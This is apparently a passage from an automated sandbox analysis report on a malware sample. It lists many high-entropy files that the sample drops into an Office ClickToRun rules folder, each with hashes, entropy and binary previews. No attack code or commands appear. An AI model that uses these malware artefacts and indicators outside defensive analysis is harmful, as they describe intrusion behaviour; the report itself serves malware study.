                                                                                                                          Preview:.<?U...9.kI....l..C...K...O....eZ...qm.I4.....<..j.!G;$.M..N..........q#*B"..@......eY.9T Y...<M.OC]...4.(.R...K....\>.u...i..F.z6/..........v.b...k...P.&.{...)Z........e$Iz&...u.C.dXy"6.2.."$.....+.3.S.J..r.(.N.........i>.3.Z_i...&..^.o{.%.......RB....9sTXe..+....P.....~.1......._.i...R2........d...W..@Dd...Qwh.`...!+G.....e1.C......K.......wqz.[?"u.`..R..BR*"...d.^s. .e .h.....y;.9| |<..}<..C...tZ..`Ut.h.6B.$.Z...U........e0..J..{.....,....B..wn. .R.[zz...d..l.w..K....>.....UZ..=5oZ..b...]...../.....Sj..P.%..`..$R..8...`............p.e...Q.X ..7V._F.Oc\.wT#,.?.f.[.u.L.D.t...Z...J..{.NXM9...L..@.v....74.~....mcJkk"h{'.;.Y.. ..m\..3....uQ.R..y.g..$.#...>.T..Z....g...'....4.a....^x......j`x1.c.W!e.m.yI.hq....4[xh.atP.w..Wl.}....8.....C.g6...kh..q......B7...@U)...W1"...Yn.}..... m.p...<...u,P...m......5...ab.<....nE........z....i...`...y.....b......;Z.Z.F>o..7...z..4...^.}.8R..R...:k'...A<....-...v...\L##.G........!..).I(...R.V..i.s....X.C.+.~H.......Z

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703950v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1700
                                                                                                                          Entropy (8bit):7.90021186160345
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:T4T0+tlReD7fMy17qKDUrqrKRpXrpHooZNf3jIXGQLODJ3NexJkGj321Joi2HewI:u0IlM9Arr5rpHeXGE6Avj38oigCnV7D
                                                                                                                          MD5:10C8CE3894F838C211BC1540DC07EF86
                                                                                                                          SHA1:A5C8A682D16060BB0C9467AD3B4D9DFF904E53AB
                                                                                                                          SHA-256:CAD3AF7A08FF30FD0117A96C44D623888C95EAC4F017A79326090BDE6AAADAD6
                                                                                                                          SHA-512:30482CC1FE66F5BE6EBCBCDCC608A77C707BD41DDF8E395BC82E1A8B31F1D8B1DC9598740C174452D180FE0AB40D4232085AA7216D6408AAC708B6FC96273516
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.P...E..|R..b...FI.0n......A.j.....!.k.QV......O.r+.>.r`.`\~C..8.[........*^E..sDy.....a.:.eKE.S..?.+..f...G.R.M)...c..lV.....K,A...._..J@..(....>.+h....P..f.\P5..SQ.Q.W.....!..nV..C...#k.h...h._..D.4...<..\....#.sJ(.yi.Vh<...B...gbz~.4^z'....)..\dw..$wjz...b....[.g.q.^9..V..........P..Q.8..p.:..u.8_E[a...@Z|^...0.......T...PG.....J....q.C..3........~.tyQ..d........l...Wz.....}..?..'...[.h.../..A,.I.)....".$.k.c...r.>.>K.....O.m....IV,....o....=..c.(.........J....p...M...=g.4..d...e|.<.jz../....B..K..(j......K...v@..`F...h*..k.w>Y....3$...<..c. ...#..R...8..q{.G..-..5....]4E.JO..gy...8......=<.TO......i.ML......;3.........L..@/.K}.-.h..B1...4.z......n..t......u..*.QX.....m.A...;..t........_E).].....Q....ez.=.......8.r.%...fG.&.b.A.ErI......l..`..3..8...K..n..8^UM.F=..p..M...Pv. gp..t.9..BN..TX..v`2{I.<..wq..po.w...d.-.P.......n....k=..F.Y.*.>;]d5A.kG.y..Ot.1n.I.Y...J.1B;.T.A.........\`.mH.Y.C3/.{s.W&h..v... ...:..]mHHe[bX....F9...y....&...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703951v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1737
                                                                                                                          Entropy (8bit):7.890522464327054
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:eyysfkEalsbjXe9XRBlZRmWa1M3X56M+9Inye3iWDA+BeZRsF05ufWGbD:vjcEQ9XRBlZRm3i3J6MfgQC5ufWUD
                                                                                                                          MD5:8ED9E21B0F4310E8E73815DA7CE058D8
                                                                                                                          SHA1:75776253184E0E09BE8B2464644CC1CA3FE75E64
                                                                                                                          SHA-256:DD8B5CE055AE0FED09483A02103C84DF30E4B1F40DC5559DB650A5457C0E80F8
                                                                                                                          SHA-512:ED7C95A7A5B3A2C2DA26079F69889AC4E3717C8AF8D54D73B6B57E1945E7D2CCC5258C924A067A04F87B5E86A86D98D0531F0C6D364DFCDC5B0EFA334BAFE2A5
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.4?.:.....<5..9...k7..'>.^...*.p.S...k=.....*J.;-...q.......K.I..M.>.?.......OU........$:mvzR.p.A...8.A.._a...]...>..@.|o._..f..V.n.^.qHRL^L...~....6V.1.5../...._;.?..g.....#P.I..-..<!,.............9...\ H.D.Su....s...%.L..&..O<z.c..vb..........{.k@...I..m$.w.m.#...<..INAF.....H.............e!..,..(%Uq..`..AG.x/.j#^.{.7.C.;.......YiA.e/..9..../..A.U.-..`.......I.6^.r.....0.....!.t@.N.u.n.....|A...........]......4.z-.^w.K.4..%.hdu.8....@........g...Y..[e..s.hoU<.&.!Q.eqn.T..H.Et,.>.[M.>..q........1...b.2p.......IG...1%....$.}..)6-.".|B-..-D>a&.Z.Y.)<..gQFB...LAC7..d.9G...L=.'.j.{..}j+.g.{.;..a....{..WM..;..R.b..}~.'...P....2.q;....6i.k.....M...".F.I{.++..Ow..W...t.E.W.@d:.R..7?l.j....Q..?.U:Q......6yv;2..lC9.5.......X.W....(........&.$..!+..f..R..c.W.......G.Yz.w#...../.y.g.._.;.....w.9sZP..s.V...mnF..i?.G.u/....l..n/<......z.%.......C...}.4..Z}c......>..x..S;........C..FC...B..Pi..cCn.7;.V..H,+.*..a.{.#..bi.........x)..7.<.v...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704000v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1716
                                                                                                                          Entropy (8bit):7.8818502543112405
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:/TkXO+pk3+2J3l0ReaGVUa0mfg2hl15rLy9nuH68Vwpj8oFQzmCfomIAXbD:/TkNpk39oY26vn1wu0q8QzmCfrrD
                                                                                                                          MD5:E2F99D8F7050CAB2CBDBE2A0C86370FA
                                                                                                                          SHA1:54926F784DDAAA14CC2F25C75ABA1FF8FFF1D307
                                                                                                                          SHA-256:CA651D7E71FD7A0B4C83C896CDCE1A9336A0E5FCB8584FAE36586A219B812155
                                                                                                                          SHA-512:AACF689BE9965DEE7846F0D78352EE01BE685B0B4AA0D3F322A70A632696576FA089E1CFE701E1047540D92B057EF6977CB465AAEFA92DAE3E32447ABBA25A7F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?....M...f...${.JABu~F..a...3g..j:f.a.a`TGW..<..".v...W.....%.I.).*........HZBD.Lw.I.1.-.@R.r;../...<.(..'5c...x.e........C>.#iGic....,..B.M1f....h.33l... ..V.y'...A[..z`.W.Bs.4..l..q.t..7(."0...j.V...{.&..N..E..!.8.D\..`0..D"Ga....^....B5..n.`..gf....O.-...&.WX....j*S...9.....Q#......._~.jh..Q..?.Z4.c..A....F...xk=).>v...8.........'.D!.}.G..Sb..? .-..]F.N.eGkk`znh....6.t..TL.M.4.nw..~.-.co..KK}...&...a4.Z. . .dsb.r..O..G.kv$.ah.5....S...ai..."%...M......O.!..].......0..G.:.....,;..n.L...;..>i..%3@pz6...6..dpV..e.mJI9$P....<.(..D.....n.Z"..'.B.._bh..P...{.S....+.;.......w.hi5b.O..A.N.yy.T[h.c........q.|..UU.8=.....p./c.{.P\^.y..v=...!T..k.u...........j..!.&.....n).}....T.q".M...Bm.Aw...h./)....N.5.>6.c.M..7.7....#.0.@....Qe.N_...D...K....Z..;...6...O.......{9..{r.:O...r.y...(...+...#7.4..c's.....11zT..rW.T-...*...H..9.....o.Ck.."...j.... 0<)..E.S.....xH7^pX.qa...lm..;k&Z<.......p..M.-I.jO.a.G.$..v...L..y..V....&,...r.uCgq.P..Ca.&.K........:

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704001v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1753
                                                                                                                          Entropy (8bit):7.889979539258995
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:VnRsul0D+cs2HxfO3D9k7TYenpVSDX5dlH7LD:VRP++AHBOhk7TYezSb5dlH7n
                                                                                                                          MD5:37E0062CE3E8D89F993937360E026CE4
                                                                                                                          SHA1:B4A7C300EE85122E5FE1DA6852AA4DF83639801C
                                                                                                                          SHA-256:7D420E784FD78E061F4ACEFE0C4C0D3B3CE25931908353A641C226438712B546
                                                                                                                          SHA-512:E681B8C307AAA7E450760553A41F29CFAADBF0A090AE168F513370D2334F927CC7C2242F0B717C9F5BA258B15F2B4A70DB4AD3FCF142973B3F585C3DCA03750C
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?UB.O2.@.#....F......aj...?NQ...d`....X".../..h...e....K..|..(|.t2QU=..dXF9....59...@.../.Y@......8$r.Y.........7.F.H....:.Hd`.?&.~F.]?...,=..q.<t.....D....f..S.Hf.).6.9..+...Z.~..VX.....!.....;...h..t....`.J1..[ j.@....i....p+.Q.t.+....g.....t&tf....Dk.7.|..+..u../.'Hoz.K...G.s.......t.m..._.....>..|..LN.[T...P.!j...Q....Z..[.G...^s.F.....$...z.I...e.f.....K........Y......X/5Z|Z...c.C...K...A.OV..k..]l.Y{..8.Oh`...S..%..a..3......-..pf[...d6H-....k.j.....w..,..j.i..Hz.+...Z.'...H.O.I........o....>........G.jK.. ..qJ................w..D...+W..G.E....'x.JlY.....I....f...W...c.F.}.......TE9.w}[..n....V...3.>.o.A....?.!. ..kz..*.L.Aw ..........w....].]....o...$..^?.....r..1i..i...=.<n...h..J..T}p1..~5K-?nJ..*.6W.@...QJ..%e.i....w?&...u7J...M.W..P`q3..NW.b.u.K..\...].....`U6.@.[.C..|nSzqQ...J.L\.$..*.0...Dt........PRIb....N..$.....i.q...6.7zDg....9MZL.c.E1.....<.....u....,......j. .'[.c..G..&f..z8..kvNII....%h..B).7n.4y...T.#.JE......:.(..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704050v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1690
                                                                                                                          Entropy (8bit):7.870541028663319
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2bZm959ZfpTQu3Rqe/DQP+IGa10RRz2gv90gEcBEWRLx6HIEmOAYRGh9axbD:2VPelIGaIz9v6cB9LsHNPAYR29cD
                                                                                                                          MD5:5B9BCA3A4D409CB3E192A2E9E27F7C27
                                                                                                                          SHA1:3EFAE98F2957ABBEAB9F18F28856C2F4E70F4934
                                                                                                                          SHA-256:9D2D12EE798256ED0F1772B5D2ADCC8EF6C43762A82F899E2EF13D6CCCE292F2
                                                                                                                          SHA-512:E25E27603C9A59FEE051A4643E80E2FA5E2BC2194494B934F08AC4324722048A0071B78FE9B9E7E00ABFC791E850C67DFDB35883978D6643E5C7F51858522FDC
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.6...D~.r.@...K...}.#.CaG..R....T..{`1..DM...a...\..:......S..<na.AA.&-..kN;`Y....Ov?.z#.|"?.7V........tI..B./...}...]....B.:7=..?J.z.....Tg.Xu.....].j..~4..'.......E.;....Y.......n....c3..?i....%".f..H...M8.5.p.Ki.........Q...u..].W..L$...H.8..N4..]_....:?d.-..?.&....Bq.(.S.h$...8j?......._..!.h...e.iv.G<...@.5..z..B.....M...........h...~.$R..j.!D...."tK.q.N;..{.z.t.g.g.0y....(..3.{V[IB...w.....o.... ...~.88Kq..;./.v.9.2.J...../V....Q.F..J......>.....~Y...b.)..f:7A.4.Oe.dkfY\]n-....*..#5n...R..gpS........>@.r1...Q......2........?[a6a3IJ.o....m5.....D.!k.R..i%.....lg.....=UL...s3R.....b^W.+$.4...n.*.H....0/.)+.z......p...e.5)~8.$.8.)4.Q..O8....S.)....b$[%X;._1.f..P]Y<t.AlQg..&S,Q.UM'.H.b..X...,}.M1..C}./..N:H.w..C.(..M...F........ ..0..B....]..Ts..4C/........?........i..@....,f.+.....S...B{... ix$..+.g...e....T...M.6......i...*.!?gI..G6...tD..B..l.F..nNp^.kVD_R.'A...Hu...)B..>p....}n..`.[0.W..s.......,.....a...L..>-..2"y.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704051v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1727
                                                                                                                          Entropy (8bit):7.88308860804509
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zJsplENGJxNkQ1olA4MoOe6BQvyQR+fQYfLrMGD:6lENqxNkqolAoUlfh5
                                                                                                                          MD5:C1D889814BF3FC7FBB0BAE13A924ABAF
                                                                                                                          SHA1:2EA2C2A583DDDD898CECA708BD4ED0FDAE3A49E3
                                                                                                                          SHA-256:22E4645534CEA3E275251B22B7536AE377A2239111ADAFDEF974123C110E7C9E
                                                                                                                          SHA-512:6BC91A5656927477D84E9440EB98715A25E1DA299F15C2C6B10E42B1CB0AEAF8F1B921F04AC7A3E575CAA0127BAC604F3947F2D7CADC95CB9D090E9CF8F65531
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?..o.h b._..>UZo......L..P.of/.%.EE...B.D....mK....kxj.......{^<i.v.NC..d@.5.mGbc...l.=.B.......E.y.\.R.x>p..\tz...c.Ul.q...5>...3.....8Y....V^..0..)...4..5^.k.la_...{.'.;.....)........~.....&.......N.............Vf^..5~. ..Z..._y...y..W.....3.OW.t.f....<.....$..........R[.488&u...~.V}....[.1....}Q..J.....:....S..B.u.*<..M.#.gT..uzW..u>Z.....)..@hd...O....C.SZ~..E...N.Q....x.{.C1...n......Y.L/3.F....e.4.2O.b@...,...h.!....."...).F.2..H..h...p.......M...3.2..CO.L...E....E6.h....<......cc!f.9n.Sz../B....].....>{....p.}e44Z./..o....,...5.....F.x....^Xw.:$yI?.)*u.....,.h5.... .rnD~c.Ia.].fj.....U....J=..."..Yv.As...EtY...8y.....?..<u..(.ih5..^....NS.s0...NW....!V.cR@..."<..;.*.m..V..V/K+#a.>j#L'...+........0Y.1......?JL].-.......s5.....U`..e.....n.2......-6.#......R..Un.n.i.\.G..|rv.=ix.......^w.vJ...W8.q.:$0|..b)..(C7....!Qa.....r.....B...R.q.......,.>..).|....... ..|:...#^)8JB..M...L..._0R....f...>a.7.-@...p1...h...n.-.@.........\......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704100v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1696
                                                                                                                          Entropy (8bit):7.8634748478891625
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ePhF/eS3OUt2eFCw0Omy9yiExbhO0CXOcmICCmRbFGDkVeB5tpm2BdhFkLwbD:elr4wCtOr9y5bhO0CXwICJRBGz/VtD
                                                                                                                          MD5:9005E66EE2BEC770A0408CBB25843717
                                                                                                                          SHA1:9D973C72003126645740936B9C9AB8356271A0C4
                                                                                                                          SHA-256:3E87A029D22A526F5B2EA6FED7F575A159F588CE42A64D2B153FC9E0A71BD42A
                                                                                                                          SHA-512:4123BC23E84A890C004898D13E22E32D5497C733DC10631465BEE748655552743EF3FA4D63DD064A2DC14B80688E2596D1CFF62D74712BABF5A75595128902BE
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.2....=..kpN......8qB9.I............z.l...K.x.e>..:..L.r.........W.......!..........G.\.J.........z34..f...}......(Z..f..Ef........Fg\..:.....fY.....^..z.M ..=yT..'...YL.....j....?...U&..mm.-.`n...N.iEkkQ..R.1..iC{.E.K.L...<,.rG6.*.e..l.3..BS..8.,...DX..w.dOje<...%...qU.u...........H.&...z......C6...N.......4>9*......LaV.]..9k...;p.R'A..k4.........f[lx..'.."w..y.b...W.........8..;{.y..rF..A>D.*..Zk...)K....$.\...4M.#....5q....v3a.b.M.p.M......a#.<#..6....=.X......Y.wuj.sc#....+...W....7....:...En.....(.$.3...4ac..G..~e........=.6......."\....k3..^9.X...[.F...".....hu...C1${l.....B............d.i.jY@b.!...\. ......W....2.`.......\.F..S[._......f# $4.B.......,....8.z..1..\QZ...=....v9..K..a..}........{t.o....[T..~YP..<.7.][..l..=.gJ\.tF%.P..1..&K.z.ZBi.....V..?.1......8..&.el.B.c.....TW.Yf......-.t.g.4.g>m...8TE.=.........!.o..I^+.kg ..d....c[z.H;..G...u..~p....t......&E.%B...eO...|..7H...1.X...[c+..].<}(n..b.s*8..v....[..Y..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704101v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1733
                                                                                                                          Entropy (8bit):7.88182748481847
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:87s6AWjQSSjt6PnPH1hGKy8hl+FovsacD:87buSSSh/y8hl+iNY
                                                                                                                          MD5:248CB8F5B2E9EBFDB67BD1C7769D841E
                                                                                                                          SHA1:AD1A095EDC355F77191E1F72E0F97E7B3C2AEA5E
                                                                                                                          SHA-256:231BF91E6709B83BC5CDA7635AEE93CCA8A3465507C25A37AFBE6EF6A2A82BBE
                                                                                                                          SHA-512:1A66224D1FDF464121D779A1E70F66E329A9B54C4941EAF2E3473DA0ABFA3DE6544A4343D04851D5E5CBEA5BD9E6FCCE8C5ABB4797665E8E28DCA0EC04DD2E03
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?............d..._wa.ZD.+.)B.|...w.~e..B...A.*.....s..N.A..v..._$...I.c.... g'.....2...........T...^..e.9.,.....Q....:..d(......D..+s.."..\-y.}....}.C......b.R..4F..7.;.H...:6.Fd...C...y...?.n...a"o..h_......v...I.7.k..s=.....=.v.?.E`0.D.].y.1p...1...b.I.i0...z.A.xM.x.K.,.ck...=1.......+..p..Y.?.......L....'....a....J........=..V....9$N..$.3.O.c.. Ut..t.....|..!h.#c..k...p......<....E.J...x...8V....?<1:s.....R.......y.+..!..bIz.u.Y<.....D..S.5.)|...*........G....y.......!.v.....X.Tr.G..aj.#s.+.T.%b.Ol..S.I/......~@o...`.U......\.....8..H/>...8...P.D.F..C.YX.._...D%T...0n!j+9%F*... .n.\d._..{-.?....,.........'..;..9.*o.2.On|..R......R../s..l....B(_.4.E....2..~#(..........^B}...O.`...i&........4.N-.H99(../3........../.:.S..[8.Q.......]..K.........$....K......'......<......D.<..oy..0.+p...\..k..q.|...............i!"..-.I.J.....A./;.<S:?B......aL.q.oK-...b..C.?..~>.vkp...7.i...Cx...'....}.:j(n...... .a.........Lx.O..7@'l*..Y....<...:.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704150v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1696
                                                                                                                          Entropy (8bit):7.892927029970031
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:DqZEsplGzCJhrq0ip4ejIMK5L/mX/gaGuiZD:ep8Ahr8PjIvOXTFU
                                                                                                                          MD5:48C1D503902F2850BB25F4F68C24FD8F
                                                                                                                          SHA1:763F3ECE9BA171093F5C591B5B4929F7AE8FECD9
                                                                                                                          SHA-256:EC8C4BE20B29B90C1E1B84F6CE499C4DBE7E168F62A318CBF26C289F4D9FF189
                                                                                                                          SHA-512:EC15AC33A588F3A19FC44543A6781AD6A85E542FD86595AA1F9A73B8AACCFC10DE7BA6232A4CBA9233308679CE29CB7BC11A40D9C5FF03EDCADC31396257F964
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?....t.O..9.%..G..`.....@...L..!eW.!q.y.rHa....._.q4#.:.CR..|...p.....!1...}.........p....NV.*.E..Th.J8.R...+../.{...;U..f...G..o..W..rt...-L8.Dg.r1.C\5.\1`.z.....y.....:W<.8!i.....T...c..#i.A..I.z..$.....W....$..ix.if}.\.l.<....#a]m..4.#....kR1.!.e,....X.~...5*.8^[v...............p"..).-1.e.~m}cP%..,.5.MX...Q..._.O7*'...d..|'.l2..Q...V.$.....D-4....;...%'z.....:g4."UwNo[O.eI.EB......9....'....!]!.....c~.P.............>$n...L.Z.......jf...F.l..0.u..4Z*......f....0..x.vC...WGz.....g(S....e1...W.pd...s...Xi.b..-..k...*........8a..3F.......I..Y...$e.X...s+Z....(...m.....y((..!.V..')p)S....U.u.A..5.@..c]Q...O.j.]..$kW.......gz.M.y.jH,]t...LE....}::...50..;......d.qA.w.p.f...[S...*.a.!...g.DO/+...g.+..tRX..VV$Mz.N...f.}X.. m......Y}.#.Y.e....N4.*.vA..oB.........kE..<.....#...'.D..c.i..&..M;.Kvz...L...... .._....G...L......EA.....e..W.vlnk...C..e.K.8..o..1[..+....VMO`.v.....7..^...l]1f~....)...Z....b..c.>H..r..5.D52&..[K.2.{."..c..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704151v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1733
                                                                                                                          Entropy (8bit):7.8896037013859734
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:20Jf7/AurPo5M2ZEC9114pAC3CQC4gilyCuPuD:dXrC+yhFsyCKW
                                                                                                                          MD5:B4A6D2403DA551A922C56C021CB6AA06
                                                                                                                          SHA1:1E94CAECC7177F5CA3518AA7BD167B9DFA456D97
                                                                                                                          SHA-256:B4A13D466878D78FB529F0C8BEF4225B6B9E8506175B19907472B96B180199E9
                                                                                                                          SHA-512:8F29FD9EB5DC53DBAE29903317DB6D87A12520B320D7EE2947E66BEF0FF06481E56694842C12A3854D41C657250B26C6FCB1300C93D6B284E156555DB94D8AA9
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?C/...L;.o.R.....k.._.lg.....V..*.8..iTu`1V....)=sW.p.....V.^........G.L.{g.......z..RifVv.J,T...=NN... .MQ..0.z.1K;Ec9`M..0..x`.$..,.......".....rHGx.C.fCW."c.[u@.<$^..8........v.v...%"..Q\$I..&.4=....P.0..`.R..S.(......Z.Y..8.\..^..=..p.I.x..)C.3].V.TOt.1.[7.B1"-....nF....Z....O.....$^....?..Y<...s...-I.tW.+e..!<./.....i8.....[.egqi..._.1.. . ..(...@....I.....<%.Y.....ph.....-...@G..A....g.$...Sl..eJNS...r.G...2.}..Mr......LX.5..E+....G1.:.Xz...#...-..=L.nr5..CE5c..Oj!.#....+q.wC...=ZK|..f7m"I...`...4H..I....=..E,..U..s.....J....>....Q.(X.......A....<.S..._Z....w..s.).A)Bft6.Z.-`./.H})..]..[..Qe...<...%..../+...z.Z9.....r.l...z..NG.6=}....Ig......K{....F@......Ks....k..3..Ni>.V...w.a.~Ac.Fc........,|b...~.... ....zk...G.\G.....G..S..D.....^...U-bV... sq.rj..l..>.q..H..+......u.d.b......J~..Nh.."...o.......q..w#L...8N..s.........f.....9x..y~.. v.......TRYq.g...T..q...........t.T.-..J.|...9.9.3.Gn...~.{..V0J.d.l..=..].i..(.......7

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704200v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1714
                                                                                                                          Entropy (8bit):7.872641675389085
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:8BcpNXGDn+Sct9FEwk4cIIwrN87LLUBMP18La1RlrD:8INSK/lJpNsLCMPuLwh
                                                                                                                          MD5:5272DA311B7FE6D85A85DB51A4E35D4A
                                                                                                                          SHA1:DD514CEC727DE978B94E1654F3DAD99B020B6A40
                                                                                                                          SHA-256:86A0785622C5B787144A2B5C1A4A28EDDD0010994228A7511D4507A4226A4A13
                                                                                                                          SHA-512:C413126AE4DB87B72975D5C825FF54730D353A9A8654A64BA01A01218B1D3C93090ACBF167BF46BAB0FFF650F4A98CD46284AFD78085957D3811CC9795699643
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?~Z..F.p.]...1..q....4....4..Nurk.%......DE..u.e..?.h..[r...h#.+x...t1...=.,...NR...j....ZDUp<....cZ....[.. P..+..)....5E..)...`....,..'P..:v....}.B1.,.......g......%..`....e.dX.i=Ar.o.$.&.*..D.....k..s....\J!.$....,...#h......q(5.`>...k..0........O.R..1......J4Af...<....V~.....&.F"=..Nu...k.......5.......);...@>...*.w[.6.3m..2..G.|..`.Z.;..*_.]...D..A/.4z...U.nR...,........=E.jZ..}.k*..m..f.9c.*&.&.-.<.K......\xU.[..}.......W......>.~.mU...*V..T.DJ.D..Y.f4.%.]...x.....-.0...$.[.....:'...P!c]...K.Z...p.l..E.p.(...3=.z..$.e.z.N.....[S.[......0.3....5.K.l0.3e..m..~....`...... -O....L.,.'!.c.T&...X.dS.w.A..?&...{.......7....uP...[..hw.G*.......``...+.&.Aq..e.......kj;...^....w..Dj.U.2..;.@H.z..m.o..V..{...c$.....T...,.Z..;...m..7.=....;.]Ke.=8.....G.|&%....#;+.>&}.......=V..$..-..t.B...'v.F71....f).[L.I....1..,...[....:....j..g..;.....`..a`._!..Ar...k{.`...54B/.*.........o..Tnw.u...9.1..J|6.].6..D]..G....1.f...!..N......0...f...lv].

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704201v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1751
                                                                                                                          Entropy (8bit):7.891633909543258
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:E0EfDxs0FQFnZg0TxHjZckzcRJO2AvtZr7yiXCTVqh3oAA+a05nMH5otdO6lDwbD:Ebt10nZNxDOAcRc2APXGqpobk5v3OuuD
                                                                                                                          MD5:FEF9AAC7C93F83FCC8A92D2657301DBD
                                                                                                                          SHA1:16BAB53BCAF1BE87FD7AE3FD2DCA33A3A6BB8EF8
                                                                                                                          SHA-256:A23D5D2C6B44EA88C0CFC9A0507299F3BB328D4B078DCE9A0F390D03B76AE75E
                                                                                                                          SHA-512:90BAF15C83D2B85D38CD037B7EE6DA19B582CBD5C9AA73AFE4460CF38B186AF58051ABDFC9C0798D627C01A968FC86D84AECA30B20AE38A750BA0342A14F1411
                                                                                                                          Malicious:false
